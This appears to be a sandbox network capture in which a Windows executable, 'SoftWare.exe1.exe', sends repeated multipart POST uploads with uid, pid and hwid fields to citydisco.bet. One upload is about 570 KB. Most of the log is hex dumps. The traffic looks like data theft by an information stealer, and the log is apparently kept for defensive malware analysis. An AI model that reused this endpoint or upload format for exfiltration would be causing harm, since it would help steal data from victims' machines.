2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 16 2b d3 2c c2 57 b7 2b d8 dd 33 73 1f b1 f1 ab 51 b9 4a 18 03 6c e9 1e 5a bf ec d9 77 96 5f 15 a0 bd 28 7c 0d a6 c9 78 a4 02 9c 6d 29 bc fc ab 87 2d ea f9 34 a4 45 c8 c0 58 e0 f5 e1 13 94 49 77 36 11 44 ff 8f 3e ac db 7c 56 24 b6 64 a1 c8 f7 46 5c f6 fe a5 fd 38 86 1e 83 b6 02 65 6f 31 69 7d eb 17 0f 97 10 26 ea 66 86 2b e3 82 f5 29 5e ee 6f 95 0f 5b 61 a2 9a 39 2f 6c 3b f7 0b 7d ed 36 f6 8d 0c 1a e3 f9 d1 11 b3 1f b6 fc 69 79 fa 39 42 66 17 b0 35 d6 f8 e5 c2 9a c9 2c 4a e6 10 ec e2 95 08 c4 1a c2 8b 11 b6 49 68 ae 4b 29 ce c1 7a e5 fb a8 5d a3 f4 6c 5c a4 bd a1 73 4f b3 5c 97 9b 72 8b 8c a4 4e db 40 9d a4 ea a3 06 44 48 cf ff b1 ff 77 5b 3a 84 e0 81 9b 86 7d 08 9e ac 6a 2a ca 41 99 80 2a 54 6d 03 bd cc f2 88 7b c3 33 d9 bf 8a 7b e0 05 65 9f 0c 48 22 35 Data Ascii: +,W+3sQJlZw_(\|xm)-4EXIw6D>\|V$dF\8eo1i}&f+)^o[a9/l;}6iy9Bf5,JIhK)z]l\sO\rN@DHw[:}jATm{3{eH"5
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 89 8f fb ee a4 16 4c 78 79 47 09 91 5e c7 cd f3 b7 66 3e e3 57 18 fe ac 31 a8 bd 22 46 ca 37 52 5e c0 3e d3 e1 e8 23 44 30 bd 0c 08 5e ba 02 94 42 58 74 75 11 a5 19 1e 1a 1b f1 ce 8f 35 8b 4e 40 36 60 6e 2c e6 38 ee af 0e 22 0c 5a 74 08 33 21 a2 5b 38 fa ab ee 33 95 51 5f f1 e5 fb 58 58 85 5c e0 57 75 2f b9 04 49 8f c1 16 83 32 95 25 68 c7 66 39 59 84 0e e7 a6 e7 43 c6 76 95 ce 1d 66 c5 20 88 8d ae 41 e3 1c d3 fd 93 93 67 ad fd 75 f8 4a 75 af ff a1 66 3f 60 a3 c2 70 4d c9 56 44 9c 4e 6c 1e f9 58 d9 ed 37 77 ac c7 64 7b 09 a5 b3 2e b1 60 56 54 93 27 0e 10 45 77 e9 18 d8 cb 6c fa 26 d5 03 9c 6f c1 a1 50 14 1c 6d 88 33 7c ac 90 38 58 00 2c 58 c6 fd b1 ce 6e 3f d1 f2 a0 e4 52 db 0c a7 a2 9d 12 fb 3f 78 ac 84 b6 7d be 47 6e f2 63 d5 fe fe 2d 04 0d c1 33 c9 8a Data Ascii: LxyG^f>W1"F7R^>#D0^BXtu5N@6`n,8"Zt3![83Q_XX\Wu/I2%hf9YCvf AguJuf?`pMVDNlX7wd{.`VT'Ewl&oPm3\|8X,Xn?R?x}Gnc-3
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 2e 62 97 3b 0d 72 79 c8 64 54 9d 27 ff e7 60 03 ce db 0b 73 4d 1c 96 88 3f bf 39 89 23 55 d8 f5 01 2b 79 0c 0a ca fe dd 16 6c 5d 28 8d 11 14 ea c7 86 b0 64 e1 e7 14 a4 6b b5 fd c3 38 bc f9 96 c8 f6 65 de b0 2d 7a e7 7b dd 1b 2a 6f a9 6b e2 78 2b 03 9f 9b a3 3a 15 fc 92 26 66 1b 8a d1 0f 0d 4d 22 13 32 0b 31 52 54 bb 1b 1e 41 01 ac 8f f6 53 c6 75 4d cf 91 e9 69 d5 eb 89 52 9c 9a 61 82 07 fd 05 54 a4 80 91 7d a6 69 40 7a 80 be f1 a9 43 47 c6 5c d4 36 55 51 37 0b a7 fb b8 3f 58 8f 51 82 99 76 2c 32 15 63 58 1f cd da d8 5a 32 00 58 8d 2f 7f 1d 5c 14 bb bc 32 a0 4f b5 7c b0 11 bb 15 2a c8 dc 62 84 ca e2 8a f3 11 c6 4e 7a 15 a4 36 95 ce 81 1a 2a 32 b9 ae e4 e0 40 30 59 e8 18 ef 3a 84 02 6c de b9 3d 47 b4 b2 59 b8 1b 58 53 9b 2d b5 a7 96 f4 9e b4 1d 0b aa bc d9 Data Ascii: .b;rydT'`sM?9#U+yl](dk8e-z{okx+:&fM"21RTASuMiRaT}i@zCG\6UQ7?XQv,2cXZ2X/\2O\|bNz6*2@0Y:l=GYXS-
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: dd ef 3c 77 e1 8a af 88 81 99 01 f9 ba 83 4e 9e e6 bd c9 e9 93 cf be 14 13 aa 0a 47 07 b0 b0 24 40 63 48 0e e0 19 11 73 77 21 56 49 12 99 44 ec eb 9b 80 60 e4 fd 6b 5f b1 f8 52 59 36 43 bc 22 0b ff d5 dd bb 27 f7 0a f1 68 ae 6e d8 a7 33 cc 93 a0 b3 be 3c 63 0e ee 97 6b 5a e0 d7 e2 16 83 dd 41 ea f3 bd dc c6 5d 34 3a 6f 2b e6 81 c8 07 a7 d3 e0 71 e1 38 d6 ac bc ad d1 84 00 ad 03 74 a2 4f 3b 9d 82 00 27 fd 30 96 e4 a3 ff 96 c5 5a 5d 63 b2 cc 90 f7 67 cf b1 f9 e9 03 a0 a7 08 ad 58 70 1e 7a c2 48 48 06 58 25 b6 0c af a3 5e f7 73 e6 72 00 15 0c ae f8 b3 3a 62 30 ec 03 8b df cd fa a3 90 70 ed 1a 8a 42 0d 5c f5 87 aa 10 c4 47 ab e1 ca 18 64 ed 27 4a 09 7b 7b a2 1c c2 f9 3e 04 a4 8c 79 2d aa 5a d3 f3 46 3b ed aa 7c ad a1 f0 d2 d9 d3 09 7f e7 87 88 59 0f 36 0e df Data Ascii: <wNG$@cHsw!VID`k_RY6C"'hn3<ckZA]4:o+q8tO;'0Z]cgXpzHHX%^sr:b0pB\Gd'J{{>y-ZF;\|Y6
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 29 11 79 36 11 7e 28 e6 e5 0f ea fb 25 90 c5 f1 50 7f de b8 7e 27 02 23 58 65 e4 d2 2c 8f d2 d5 d4 44 96 e2 b7 0b 8a 8d 8a 94 26 b7 3a ec c1 7e b7 7b b4 8e c5 9d be a7 d1 2b db 3d e7 8c 86 b1 e0 0a 90 4c 0b b7 c7 a0 a0 21 3d 7e 22 22 c8 8d fb 3e 8b 69 32 3e 83 e3 6f f8 66 fb d2 05 7e 16 20 5c 8e ee 53 31 5f 9a b6 14 9b 88 e8 c5 94 97 5e cf f9 2f 25 26 79 ba 0e da b4 2e 41 37 22 7c d0 77 40 e6 2f 1c 73 15 5d 34 e9 08 17 a4 8a e8 71 76 3d db c8 d9 5f 71 53 2b 1f 43 9c d4 ae 0e 3a 55 9a 2d e6 bc a3 c4 58 00 95 9a 81 bd ce 70 2d ba 44 6c 96 71 1b 28 f5 29 3b 85 69 e9 cd 2e ab 8f bc 3c 5e 02 c6 16 71 1c d3 b6 c6 9c 12 c4 f8 39 16 cc 1b 61 74 67 70 4c 74 71 9a 91 c4 ad e2 98 85 46 18 df 45 f9 59 b1 16 39 a8 d2 91 79 0f b4 e5 d9 c0 1f 8d 63 64 38 e2 b9 05 c2 fc Data Ascii: )y6~(%P~'#Xe,D&:~{+=L!=~"">i2>of~ \S1_^/%&y.A7"\|w@/s]4qv=_qS+C:U-Xp-Dlq();i.<^q9atgpLtqFEY9ycd8
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: ab 07 78 e9 eb 0d 1c 47 2c 1a 55 05 0a fe 20 24 63 0b dd e3 14 d3 87 ff 72 e5 80 5e 9c 4d 96 2b b9 d5 d9 aa 7a 0e 6c 9a 63 65 5f a3 47 81 d1 98 9f 87 43 bf ad 1d 7e 00 0f 90 80 93 3b 2a be 18 6b 59 31 60 5d 1f 2f ca 0b 76 0b 02 6c 27 29 3e 3e 97 f8 40 ac 37 11 c3 e4 fb 07 50 87 ab a6 f4 3d 6c 86 20 d4 06 ad 7f 4e d5 47 cf ef ea ec 3e b5 c4 73 14 5e 7b 22 f2 5c 03 ca 93 15 b9 1a 26 a6 e3 e1 89 4d cc 68 8c 0d 6d d2 90 30 ff b7 42 f7 c5 0c a5 ad 60 8f 93 f9 a2 a3 4d 5d 7e 8d 62 fa 67 57 93 27 6d 20 2d 9a 1c 43 bf 1c 30 08 75 00 06 fa 15 66 3d 65 37 cf c7 58 9a f9 41 c7 7d a1 84 63 72 0d c6 4d e3 85 69 72 21 0f fb 3a a3 62 f7 5c af f4 5a 09 a5 a9 87 d3 10 e7 6b 56 4f 45 b5 1c 3c b6 66 6a 44 82 77 e6 d4 bf fe e0 0a 53 5c c6 f9 98 4e 06 14 5b d5 5f 30 19 78 48 Data Ascii: xG,U $cr^M+zlce_GC~;*kY1`]/vl')>>@7P=l NG>s^{"\&Mhm0B`M]~bgW'm -C0uf=e7XA}crMir!:b\ZkVOE<fjDwS\N[_0xH
2025-03-13 12:40:03 UTC	1369	IN	Data Raw: 1c 07 e2 49 f5 26 1f 85 06 61 4e 1b ad ae 06 5e ec 71 61 94 8f 3c 79 5c f3 4d 91 f3 51 66 65 20 42 0a d8 cb e7 55 bf e0 a2 4c b8 43 cb ad d2 94 6c 03 d2 d7 2f bb 4c 88 87 da c4 6d 77 7a 6c 06 46 b7 49 46 25 1d 2f 32 9a a2 ea f5 92 b5 d8 da 6f 6b cd ee 36 4a e0 01 b2 e1 d0 03 ba a6 59 cd d0 17 93 b9 41 82 23 c0 81 f2 a1 20 68 f1 39 5a 95 91 1e 70 6c 1f 6c b0 a0 55 2a 35 ff 69 0e 31 a6 ea e0 fa 95 96 cb d4 11 97 8e a4 25 76 8a 10 5a e1 0c b8 64 f0 d2 fa c2 b3 28 82 6a 75 f9 49 ab 37 ec a0 16 aa 58 96 1f dd 30 5b 4f e4 bb 51 d8 84 31 cf d3 c0 46 b2 81 3c 5a 1b 21 e7 79 30 97 00 2f c3 57 e0 9d 31 94 09 71 7f 4e a1 64 06 81 d8 85 c4 fd ad 67 08 f7 c6 15 6f 2b bb 22 c7 a4 ce 4a 36 39 18 f5 b5 38 78 e1 80 b7 fb a3 05 ca 3f 31 e9 9f e7 9e 5c 75 2c 1e 21 86 70 aa Data Ascii: I&aN^qa<y\MQfe BULCl/LmwzlFIF%/2ok6JYA# h9ZpllU*5i1%vZd(juI7X0[OQ1F<Z!y0/W1qNdgo+"J698x?1\u,!p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49683	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:05 UTC	271	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Grq7aN5l User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14481 Host: citydisco.bet
2025-03-13 12:40:05 UTC	14481	OUT	Data Raw: 2d 2d 47 72 71 37 61 4e 35 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 0d 0a 2d 2d 47 72 71 37 61 4e 35 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 72 71 37 61 4e 35 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 45 39 33 36 38 43 37 35 43 32 46 38 44 30 42 30 42 30 41 42 Data Ascii: --Grq7aN5lContent-Disposition: form-data; name="uid"80712606b6232d4708ff7e4bff6772778b082897fe63729d1329--Grq7aN5lContent-Disposition: form-data; name="pid"2--Grq7aN5lContent-Disposition: form-data; name="hwid"C8EE9368C75C2F8D0B0B0AB
2025-03-13 12:40:06 UTC	809	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTV6F3NHhkzF1Oxirfkk1Qlnzz4wtOO9i4oYQXO7pk%2FTnbgbovpTm5RIV0IO9u4cSctZl4pB%2BayfSM34W0Opj9X7ZFphgNFhJzYLUBazKXQVRNebS9FG7KkL5iiGsy1g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb990a8dd84665-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=43511&min_rtt=37962&rtt_var=16654&sent=17&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15410&delivery_rate=70766&cwnd=236&unsent_bytes=0&cid=9e9a96ccf2288d2b&ts=1085&x=0"
2025-03-13 12:40:06 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 32 2e 35 39 2e 31 30 36 2e 32 33 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 172.59.106.23"}}
2025-03-13 12:40:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49684	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:07 UTC	280	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=76Xg9XZJFKaBwyP6J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15072 Host: citydisco.bet
2025-03-13 12:40:07 UTC	15072	OUT	Data Raw: 2d 2d 37 36 58 67 39 58 5a 4a 46 4b 61 42 77 79 50 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 0d 0a 2d 2d 37 36 58 67 39 58 5a 4a 46 4b 61 42 77 79 50 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 36 58 67 39 58 5a 4a 46 4b 61 42 77 79 50 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 Data Ascii: --76Xg9XZJFKaBwyP6JContent-Disposition: form-data; name="uid"80712606b6232d4708ff7e4bff6772778b082897fe63729d1329--76Xg9XZJFKaBwyP6JContent-Disposition: form-data; name="pid"2--76Xg9XZJFKaBwyP6JContent-Disposition: form-data; name="hwid"
2025-03-13 12:40:08 UTC	811	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6vm0ux5XIeDM8GgxIPNJnv5idCW19ghW%2B6p5SPaqhVBr09NMLB5MWYEfwtNt0AfGdmDGYxRFSQZXwiBP9DLijRyagvts35uTPGSXnRsvf2jZ2WJ%2Fr2HUF%2Fpo2CJJ3mr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb991a0900336d-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=53322&min_rtt=49508&rtt_var=14327&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16010&delivery_rate=82048&cwnd=252&unsent_bytes=0&cid=ad50b6fab4ba8451&ts=1003&x=0"
2025-03-13 12:40:08 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 32 2e 35 39 2e 31 30 36 2e 32 33 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 172.59.106.23"}}
2025-03-13 12:40:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49685	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:10 UTC	277	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0E3xaFCwmps6oZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20226 Host: citydisco.bet
2025-03-13 12:40:10 UTC	15331	OUT	Data Raw: 2d 2d 30 45 33 78 61 46 43 77 6d 70 73 36 6f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 0d 0a 2d 2d 30 45 33 78 61 46 43 77 6d 70 73 36 6f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 45 33 78 61 46 43 77 6d 70 73 36 6f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 45 39 Data Ascii: --0E3xaFCwmps6oZContent-Disposition: form-data; name="uid"80712606b6232d4708ff7e4bff6772778b082897fe63729d1329--0E3xaFCwmps6oZContent-Disposition: form-data; name="pid"3--0E3xaFCwmps6oZContent-Disposition: form-data; name="hwid"C8EE9
2025-03-13 12:40:10 UTC	4895	OUT	Data Raw: c9 94 44 40 68 60 e7 a5 b0 39 87 e6 84 57 31 9c ff db 40 a0 50 9c cd 02 9b f7 28 3f d5 64 38 b2 ea fc 26 87 7a ab e5 8e e2 e4 c9 b1 30 d8 49 1f be b5 ae ca ea a6 be a7 7c 9a 55 00 0a fb 32 b9 39 e7 cb 74 7e 3e 3b 97 0d 75 c3 84 a0 af bf 2d bd 86 5a 22 5a 6c 6e 99 82 59 f0 21 b1 73 f0 44 27 cc 75 10 6c cd f0 d2 84 19 5d f7 8d 68 8d ea 75 6a 97 64 b2 99 15 f2 53 c4 cb 35 b7 2e 8d 5f c3 f2 fb bb 45 fe d4 56 7f 9f 9e 8f bb c1 8f c4 b4 cb d3 69 ef 24 d9 a8 03 b4 fe 16 56 35 6d e4 d1 cd c0 9d c6 e8 b5 0a c7 54 0f ee 1d b9 59 19 25 5f 8c 3c 22 f2 75 0b 62 a2 44 9f 3f 69 ec 45 73 b8 67 ba e0 01 73 d2 78 75 6e f3 dc f0 d8 06 cd 2c 40 2f 1d 9d a4 e1 91 d0 69 33 21 35 97 1a fe 82 40 ac d4 4d bb f1 24 17 17 73 3a 7c ed a2 1d f6 b0 de 36 6e 6e 48 6b 3d 80 2b aa 5e 42 Data Ascii: D@h`9W1@P(?d8&z0I\|U29t~>;u-Z"ZlnY!sD'ul]hujdS5._EVi$V5mTY%_<"ubD?iEsgsxun,@/i3!5@M$s:\|6nnHk=+^B
2025-03-13 12:40:11 UTC	807	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQW4BL8Us%2Fy6b0k7bwx6kFuPixUiF7Yc6uHqADrhJeoiLIQijicqlO3JvsObLmgsnZoDTJoHbz2swT4Tm3Omv5VdwcsM7G8Sd75uDS5nb3NEfHQEJEHgEBJiCrRIZhZP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb992aec85143d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=41822&min_rtt=39735&rtt_var=11650&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21183&delivery_rate=87406&cwnd=243&unsent_bytes=0&cid=9f54f230f92ff330&ts=1123&x=0"
2025-03-13 12:40:11 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 32 2e 35 39 2e 31 30 36 2e 32 33 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 172.59.106.23"}}
2025-03-13 12:40:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49686	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:13 UTC	278	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=R4KZr3ty1rwhs0Ej User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2595 Host: citydisco.bet
2025-03-13 12:40:13 UTC	2595	OUT	Data Raw: 2d 2d 52 34 4b 5a 72 33 74 79 31 72 77 68 73 30 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 0d 0a 2d 2d 52 34 4b 5a 72 33 74 79 31 72 77 68 73 30 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 34 4b 5a 72 33 74 79 31 72 77 68 73 30 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d Data Ascii: --R4KZr3ty1rwhs0EjContent-Disposition: form-data; name="uid"80712606b6232d4708ff7e4bff6772778b082897fe63729d1329--R4KZr3ty1rwhs0EjContent-Disposition: form-data; name="pid"1--R4KZr3ty1rwhs0EjContent-Disposition: form-data; name="hwid"
2025-03-13 12:40:14 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAdp%2FFn9HAFIjcJeCgH25NmR1NKG2k1P7ypg%2F1AT%2Fd35PEBYrMxMycYKUijFwRF0v%2Bfz3eWS8An6S20ubXlSyFJ5UwkMWbgfl8nszRrnl2k3tTpF%2FCFtMtOayf6IHwDC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb993c0cafa4bb-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=55343&min_rtt=54799&rtt_var=12378&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3509&delivery_rate=72483&cwnd=252&unsent_bytes=0&cid=efda731773715876&ts=1010&x=0"
2025-03-13 12:40:14 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 32 2e 35 39 2e 31 30 36 2e 32 33 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 172.59.106.23"}}
2025-03-13 12:40:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49687	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:16 UTC	280	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=u8A8tLI73LrUVKOy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570380 Host: citydisco.bet
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 2d 2d 75 38 41 38 74 4c 49 37 33 4c 72 55 56 4b 4f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 0d 0a 2d 2d 75 38 41 38 74 4c 49 37 33 4c 72 55 56 4b 4f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 75 38 41 38 74 4c 49 37 33 4c 72 55 56 4b 4f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d Data Ascii: --u8A8tLI73LrUVKOyContent-Disposition: form-data; name="uid"80712606b6232d4708ff7e4bff6772778b082897fe63729d1329--u8A8tLI73LrUVKOyContent-Disposition: form-data; name="pid"1--u8A8tLI73LrUVKOyContent-Disposition: form-data; name="hwid"
